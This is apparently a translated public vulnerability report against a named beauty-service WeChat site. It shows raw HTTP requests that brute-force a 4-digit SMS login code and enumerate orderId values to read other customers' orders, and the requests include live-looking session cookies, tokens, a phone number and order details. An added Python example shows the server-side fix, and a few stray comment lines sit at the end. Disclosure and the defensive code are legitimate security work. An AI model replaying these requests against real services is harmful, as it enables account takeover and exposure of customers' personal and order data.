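2015-12-01: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2016-01-15: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Arbitrary user login at an on-site beauty O2O service
Logging in through the WeChat official account requires only a mobile number and a verification code, and the code is four digits. Four digits can be brute-forced.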
POST /site/login HTTP/1.1
Host: wechat.rongmomo.cc
Accept: application/json, text/javascript, */*; q=0.01
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://wechat.rongmomo.cc
Content-Length: 112
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 MicroMessenger/6.3.7 NetType/WIFI Language/zh_CN
Referer: http://wechat.rongmomo.cc/site/login
Cookie: PHPSESSID=rp11cavm433sb45pis0ut7jpl4; _csrf=95f86ab8ba8a4a30b120d56e1a64caaa16981c700ba0d328e3827acdf94b4be7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22HQCr33iLh4Qa3eu94KyMr13KvGlY6wQo%22%3B%7D; checkoutOrder=%7B%22order_id%22%3A85732%2C%22number%22%3A%221573785732%22%2C%22paid_amount%22%3A228%2C%22created_at%22%3A%222015-11-30+18%3A05%22%2C%22service_time%22%3A%222015-11-30+22%3A00%22%2C%22service_hours%22%3A90%2C%22finish_time%22%3A%222015-11-30+23%3A30%22%2C%22payment%22%3A1%7D; current_city=%7B%22id%22%3A%222%22%2C%22name%22%3A%22%E4%B8%8A%E6%B5%B7%E5%B8%82%22%7D; locate=1

mobile=13888888888&captcha=9220&_csrf=QXFVZndmZHYJIBYURFUNOilFBAdEAxFPdTosKwVXVz03Njk%2FQRE1GQ%3D%3D&reference=0
Request used to view an order in the WeChat official account; simply iterating over orderId is enough.
GET /order/detail?orderId=85731 HTTP/1.1
Host: wechat.rongmomo.cc
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=c3v80m9m1n6csbjcl792l1duc0; _csrf=95f86ab8ba8a4a30b120d56e1a64caaa16981c700ba0d328e3827acdf94b4be7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22HQCr33iLh4Qa3eu94KyMr13KvGlY6wQo%22%3B%7D; _identity=53eaab2f6b24892bb386e075219dd191974e98feeb5b731042a37313c27238ffa%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B27589%2C%222v3gFv_tlIWmhhywShV72Sa6gI534BdC%22%2C2592000%5D%22%3B%7D; current_city=%7B%22id%22%3A%221%22%2C%22name%22%3A%22%E5%8C%97%E4%BA%AC%E5%B8%82%22%7D; locate=1
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 MicroMessenger/6.3.7 NetType/WIFI Language/zh_CN
Accept-Language: zh-cn
Referer: http://wechat.rongmomo.cc/pay/fail?id=85732&attach=1
Cache-Control: max-age=0
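The server-side checks whose absence the two requests above rely on, as an added example that is not part of the original report and not the vendor's code: a login code that is burned after a few wrong guesses, and an order lookup bound to the session's user. The class and function names, the 6-digit length, the attempt and lifetime limits and the sample order data are all assumptions made for illustration.

```python
import hmac
import secrets
import time

MAX_ATTEMPTS = 5      # assumed policy: wrong guesses allowed per issued code
CODE_TTL = 300        # assumed policy: seconds a code stays valid


class LoginCodeStore:
    """In-memory stand-in (hypothetical) for the server-side store of SMS codes."""

    def __init__(self, clock=time.time):
        self._codes = {}   # mobile -> [code, expires_at, failed_attempts]
        self._clock = clock

    def issue(self, mobile):
        code = f"{secrets.randbelow(10**6):06d}"   # 6 digits instead of 4
        self._codes[mobile] = [code, self._clock() + CODE_TTL, 0]
        return code   # delivered by SMS only, never echoed to the client

    def verify(self, mobile, submitted):
        entry = self._codes.get(mobile)
        if entry is None or self._clock() > entry[1]:
            self._codes.pop(mobile, None)   # unknown or expired
            return False
        if hmac.compare_digest(entry[0].encode(), submitted.encode()):
            del self._codes[mobile]         # single use
            return True
        entry[2] += 1
        if entry[2] >= MAX_ATTEMPTS:
            del self._codes[mobile]         # burn the code; guessing cannot continue
        return False


# Constructed sample data: order id -> id of the user who placed it.
ORDERS = {85001: 1001, 85002: 1002}


def get_order(session_user_id, order_id):
    """Return the order only when it belongs to the logged-in user."""
    owner = ORDERS.get(order_id)
    if owner is None or owner != session_user_id:
        return None   # same answer for "missing" and "not yours"
    return {"order_id": order_id, "owner": owner}
```

Code issuance needs its own per-number rate limit as well, since every freshly issued code resets the attempt counter.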
You are the most professional.
Unable to contact the vendor, or the vendor actively refused.